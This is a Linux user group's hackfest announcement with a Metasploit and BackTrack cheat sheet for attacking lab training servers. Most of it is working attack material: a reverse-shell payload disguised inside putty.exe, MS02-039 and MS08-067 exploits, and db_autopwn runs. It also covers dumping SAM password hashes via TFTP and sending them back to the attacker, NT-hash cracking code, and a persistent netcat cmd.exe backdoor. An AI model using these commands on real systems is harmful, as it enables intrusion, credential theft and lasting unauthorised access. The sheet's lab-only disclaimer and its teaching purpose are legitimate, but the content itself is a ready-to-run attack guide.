CLOUD Targets/Rapid7 Scanner Presented

Steven Kaplan, MSc, BSEE, CISSP, CISA (Senior Cyber Security Analyst, DOE Palo Verde Nuclear Facility) will be presenting a full-blown (licensed) version of Rapid7, while letting us bust his cloud.

Mr. Kaplan has extensive experience in all areas of computer and network security, from instructor to practitioner. His combined problem solving, insights, innovations, programming and integration techniques have saved companies (in some cases) millions of dollars in avoided fines and have achieved innovative process optimizations, gains not strictly limited to computer security. Steven holds the relevant industry CISA, CISSP and Certified Ethical Hacker certifications. Steve's scope includes process automation, especially for collecting network security vulnerabilities and revalidating user IDs, both inside and outside HIPAA, PCI and SOX compliance work.

Activities over the last 20 years cover both Federal Government (NSA) INFOSEC experience and private-sector work for national and international industries. Technological experience includes evaluation of Role Based Access Control (RBAC) systems, Java software review (for vulnerabilities), ethical hacking (EH), and the design, evaluation, certification and accreditation (C&A) of security architectures and infrastructures. Evaluating varied systems and diverse integrated networks, including service-oriented architectures (SOA), for security vulnerabilities within legislative compliance requirements keeps Mr. Kaplan from straight command-line reverse engineering, perhaps his first love? Audit experience includes review for compliance with Sarbanes-Oxley and HIPAA regulations, and the development of specialized software tools and scripts to expedite compliance.


During the day, I will be building persistent BT4R2 USB pen drive keys for your software and network pentesting pleasure (bring a 3GB or greater flash drive) as we move through Steve's extensive presentation content. End result = a persistent Ubuntu-based BackTrack 4 R2! I will be using my own ISO, so optionally bring your own MD5 checksum to verify integrity.

This will be a mixed format: presentation/lab (with full-duplex audience communication so that the community provides content expansion and more).

Scott Becerra's Layer 7 Web Flag Server will also be on hand (if you didn't get to pwn it last time), and will be available until Scott moves south to work for the Army, hopefully at least until mid-February. We plan another Hamachi Hackfest so we can enjoy Scott's company again after he moves south.


Show up Saturday with your 3GB flash drive and notebook, and you might just need this cheat sheet to poke the PLUG Pentesting Exploit Training Servers/Cloud:

HowTos for basic Metasploit from BackTrack 4 R2 (msfconsole commands are shown at the msf> prompt and Meterpreter commands at meterpreter>; 10.10.10.254 is the training target throughout, and addresses ending in .666 are placeholders for your own BackTrack IP, since 666 is not a valid octet):

0) Quick Windows multi/handler reverse shell

startx
/etc/init.d/wicd start
{check that your wireless or wired connection is working}
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 X > /root/payload.exe
{LHOST is YOUR BackTrack address (.666 is a placeholder octet); the trailing X writes a Windows executable, without it you get raw bytes}
{optional, for a less obvious dropper on the Windows target: encode the payload into a template binary such as /root/putty.exe}
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe -x /root/putty.exe -o /root/payload.exe
msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set LHOST (your BackTrack ip, the same one baked into payload.exe; a handler has no RHOST)
msf> set LPORT 4444
msf> exploit
{copy /root/payload.exe to the Windows target and run it; the handler catches the connection and drops you at a meterpreter> prompt}
meterpreter> migrate <process #>
example: meterpreter> migrate 256
{or drive a real exploit instead of a hand-delivered payload}
msf> show exploits
msf> use <name from show exploits>
msf> set PAYLOAD <payload>
msf> set RHOST <target ip>
msf> set LHOST <your ip>
msf> exploit

1) Nmap and MSSQL 2000 (MS02-039 resolution service overflow)
nmap -sT -O 10.10.10.254
nmap -sV 10.10.10.254
nmap -sU -p 1434 10.10.10.254     {the SQL resolution service is UDP; the TCP scans above will not show it}
msfconsole
msf> show exploits
{cut and paste with your mouse highlight}
msf> use exploit/windows/mssql/ms02_039_slammer     {Framework 3 name; the old Framework 2 name was mssql2000_resolution}
msf> set PAYLOAD windows/meterpreter/bind_tcp        {Framework 2 name: win32_bind_meterpreter}
msf> show options
msf> set RHOST 10.10.10.254     (target)
msf> exploit
meterpreter> help
meterpreter> execute -h     {lists the execute options}
meterpreter> execute -f cmd.exe -c     {channelized cmd.exe; note the channel number it prints}
meterpreter> interact 1
ipconfig
{start a TFTP server on BackTrack: Menu ---> System ---> MISC ---> TFTPD Server Start; it serves /tmp, which is why the files below go there}
On your BackTrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDump4.exe PwDump4.dll /tmp/     {pwdump4 needs both the .exe and its .dll; if they are not here, find / -iname 'pwdump4*'}
cp nc.exe /tmp/
cd /pentest/password/dictionaries
ls
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt     {a plain cp leaves it gzipped}
<go back to the Windows shell; fetch the tools FROM your BackTrack box (10.10.10.666 = our ip), not from the target>
tftp -i 10.10.10.666 get PwDump4.exe
tftp -i 10.10.10.666 get PwDump4.dll
tftp -i 10.10.10.666 get nc.exe
PwDump4.exe /l /o:pwdump4.txt     {/l dumps the local SAM, /o: writes the hashes to a file; Windows switches use /, not \}
tftp -i 10.10.10.666 put pwdump4.txt     {the TFTP server must allow uploads}
<back to the BackTrack shell; the upload lands in /tmp>
cd /tmp
cat pwdump4.txt
john pwdump4.txt
john --show pwdump4.txt
john --wordlist=/tmp/wordlist.txt --format=NT pwdump4.txt
<back to Windows: leave a persistent listener bound to cmd.exe>
nc -L -p 4445 -e cmd.exe     {the value after -p is a port, not the target ip; 4445 is any free port}
<back to the BackTrack shell>
nc 10.10.10.254 4445     (or telnet 10.10.10.254 4445)
{the cracked Administrator password also lets you log in to the box's own services as Administrator}
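What `john --format=NT` is doing under the hood, as an added example for this sheet (not John the Ripper's or Metasploit's code): an NT hash is MD4 over the UTF-16LE password with no salt, so a dictionary attack costs one hash per candidate word, looked up against every account in the dump at once. The pwdump lines, the wordlist and the LM value on the `backup` account are constructed; the Administrator line carries the well-known NT hash of "password". MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
"""NT-hash dictionary attack over pwdump output (what john --format=NT does).

Added example for this cheatsheet; not John the Ripper's or Metasploit's code.
Sample dump, wordlist and the LM value on "backup" are constructed here.
"""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash (MD4) of the empty string


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(state, f, X, order, shifts, const):
    # Every step updates "a"; rotating the tuple afterwards reproduces the
    # a, d, c, b update order of RFC 1320 and is back to (a, b, c, d) after 16 steps.
    a, b, c, d = state
    for i, k in enumerate(order):
        a = _lrot((a + f(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c
    return a, b, c, d


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is frequently disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        s = tuple(h)
        s = _md4_round(s, F, X, range(16), (3, 7, 11, 19), 0)
        s = _md4_round(s, G, X, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15),
                       (3, 5, 9, 13), 0x5A827999)
        s = _md4_round(s, H, X, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15),
                       (3, 9, 11, 15), 0x6ED9EBA1)
        h = [(x + y) & MASK for x, y in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """NT hash: MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text):
    """pwdump lines are user:RID:LMhash:NThash:::  (trailing fields ignored)."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def crack_nt(entries, wordlist):
    """One MD4 per candidate, looked up against every account at once (no salt to defeat this)."""
    by_nt = {}
    for e in entries:
        by_nt.setdefault(e["nt"], []).append(e["user"])
    found = {}
    for word in [""] + list(wordlist):      # the empty password is just another hash
        for user in by_nt.get(nt_hash(word), []):
            found[user] = word
    return found


def lm_enabled(entries):
    """Accounts still storing an LM hash: crack those first, LM is far weaker than NT."""
    return [e["user"] for e in entries if e["lm"] != EMPTY_LM]


# Constructed sample dump. Administrator carries the well-known NT hash of "password";
# the LM value on "backup" is a placeholder, not derived from a real password.
SAMPLE_DUMP = "\n".join([
    "Administrator:500:" + EMPTY_LM + ":8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:" + EMPTY_LM + ":" + EMPTY_NT + ":::",
    "backup:1001:0123456789abcdef0123456789abcdef:" + nt_hash("Summer2010") + ":::",
    "svc_sql:1002:" + EMPTY_LM + ":" + nt_hash("Tr0ub4dor&3") + ":::",
])
WORDLIST = ["123456", "password", "Summer2010", "letmein"]   # constructed stand-in for wordlist.txt

if __name__ == "__main__":
    accounts = parse_pwdump(SAMPLE_DUMP)
    print("LM hashes present for:", lm_enabled(accounts))
    for user, pw in crack_nt(accounts, WORDLIST).items():
        print(f"{user}: {pw!r}")
```

Two things the script makes visible that the john one-liner hides: a Guest account with the empty-string NT hash is "cracked" by the empty candidate, and any account whose LM field is not the blank value still stores an LM hash, which is the one to attack first (`--format=LM`).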

2) Quick VNC using autopwn
msfconsole
msf> db_create foo
msf> db_nmap 10.10.10.254     {or any other target ip}
msf> db_hosts
msf> db_services
msf> db_autopwn -h
msf> db_autopwn -p -t     {-t only lists the modules that match by open port; look before you launch}
msf> db_autopwn -p -e     {launches every port-matched exploit: noisy, and it can crash services}
msf> sessions -l
msf> sessions -i 1
meterpreter> sysinfo
meterpreter> run vnc     {the sheet originally listed this as vnc_oneport; check scripts/meterpreter in the framework directory for the exact script name on your build}

3) Quick SMB (use another exploit if you like) with a VNC reverse connection
msfconsole
msf> use exploit/windows/smb/ms08_067_netapi
msf> show options
msf> set PAYLOAD windows/vncinject/reverse_tcp
msf> show options
msf> set RHOST 10.10.10.254
msf> set LHOST 10.10.10.666     {our ip; placeholder octet}
msf> show options
msf> exploit
<the target connects back to LHOST and a VNC viewer opens on BackTrack: vncinject gives you the desktop, not a shell, and by default it also pops a courtesy cmd.exe on the target's screen (set DisableCourtesyShell true if you would rather stay quiet)>

4) Example using Nessus plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd -D     {run it as a daemon; the first start takes about 10 minutes while plugins load}
cd /pentest/exploits/framework3
svn update
./msfconsole
<another shell>
nessus     {the Nessus client}
Start a scan against 10.10.10.254 and generate a report; save it in NBE format as /root/nessus.nbe
msf> help
msf> db_create /root/database/foobar.db
msf> db_import /root/nessus.nbe     {newer trunk builds detect the format; older builds use the next line}
msf> db_import_nessus_nbe /root/nessus.nbe
msf> db_hosts
msf> db_services
msf> db_vulns     {the cross-reference: Nessus findings are now vulns in the db, each showing the open port and the probable issue}
msf> db_autopwn -p -t     {port match, as on the original sheet; -t lists only}
msf> db_autopwn -x -t     {-x matches on the imported vulnerability references instead of bare ports, which is the point of importing the Nessus report}
msf> db_autopwn -x -e
Voilà!
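What the db_import and db_autopwn -p pair does with a Nessus report, as an added example for this sheet (not Metasploit's importer or autopwn code): parse the pipe-delimited NBE "results" records into open (port, proto) pairs per host, then queue every exploit whose default RPORT is open on that host. The NBE excerpt, the plugin IDs in it and the two-entry module/port table are constructed; the real autopwn builds that table from the RPORT of every loaded exploit module, which is why -p is so noisy and why -t (list only) is worth running first. The resource-script output is a hand-picked substitute for -e.

```python
"""Port-based exploit matching over a Nessus .nbe report, as db_autopwn -p does it.

Added example for this cheatsheet; not Metasploit's importer or autopwn code.
The NBE excerpt, its plugin IDs and the two-entry module/port table are constructed.
"""
import re

# Stand-in for the RPORT default of each loaded exploit module (autopwn reads this
# from module metadata; here only the two modules used on this sheet).
EXPLOIT_PORTS = {
    "exploit/windows/smb/ms08_067_netapi": (445, "tcp"),
    "exploit/windows/mssql/ms02_039_slammer": (1434, "udp"),
}

# Constructed NBE excerpt (plugin IDs illustrative).
# Record layout: results|subnet|host|service (port/proto)|pluginID|severity|text
SAMPLE_NBE = """\
timestamps|||scan_start|Sat Jan 08 12:00:00 2011|
timestamps||10.10.10.254|host_start|Sat Jan 08 12:00:01 2011|
results|10.10.10|10.10.10.254|microsoft-ds (445/tcp)|11011|Security Note|An SMB server is running on this port
results|10.10.10|10.10.10.254|ms-sql-m (1434/udp)|10674|Security Note|A MS SQL Monitor service is running
results|10.10.10|10.10.10.254|http (80/tcp)|10107|Security Note|A web server is running on this port
results|10.10.10|10.10.10.254|general/tcp|19506|Security Note|Nessus scan information
results|10.10.10|10.10.10.250|ssh (22/tcp)|10267|Security Note|An ssh server is running
timestamps||10.10.10.254|host_end|Sat Jan 08 12:03:00 2011|
"""

PORT_RE = re.compile(r"\((\d+)/(tcp|udp)\)")


def parse_nbe(text):
    """Return {host: {(port, proto), ...}} from the 'results' records of an NBE file."""
    services = {}
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 5 or fields[0] != "results":
            continue
        host, service = fields[2], fields[3]
        m = PORT_RE.search(service)
        if not m:                       # host-level findings such as general/tcp carry no port
            continue
        services.setdefault(host, set()).add((int(m.group(1)), m.group(2)))
    return services


def match_by_port(services, exploit_ports=EXPLOIT_PORTS):
    """autopwn -p: queue every module whose RPORT is open on the host, Windows or not."""
    queue = []
    for host, ports in sorted(services.items()):
        for module, target in sorted(exploit_ports.items()):
            if target in ports:
                queue.append((host, module))
    return queue


def to_resource_script(queue, lhost):
    """Hand-picked alternative to -e: msfconsole resource-script lines, one module per match."""
    lines = []
    for host, module in queue:
        lines += [f"use {module}", f"set RHOST {host}", f"set LHOST {lhost}", "exploit -j -z"]
    return "\n".join(lines)


if __name__ == "__main__":
    found = parse_nbe(SAMPLE_NBE)
    matches = match_by_port(found)
    print(to_resource_script(matches, "10.10.10.1"))
```

Note that the ssh-only host gets nothing queued while the Windows box gets both modules purely because 445/tcp and 1434/udp are open; nothing here checks the OS or whether the service is actually vulnerable, which is exactly the gap that -x (matching on the imported Nessus references) closes.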


DISCLAIMER: The use of BackTrack 4 R2 is advocated in pentest laboratories only, and on production systems only by fully qualified professionals after written corporate approval. We do not advocate "cracking" and prefer the definition of hacker in its original sense: those who reverse engineer and creatively find alternate uses for common IT systems. With a group educational focus, PLUG Hackfests do not advocate "learning to hack"; instead, hacking to learn.

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com the Second and Third Saturdays Noon - 3PM
Attend long enough and we morph into a team.
--

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com

Catch my Metasploit & IP camera surveillance
presentations @ ABLEConf.com in April!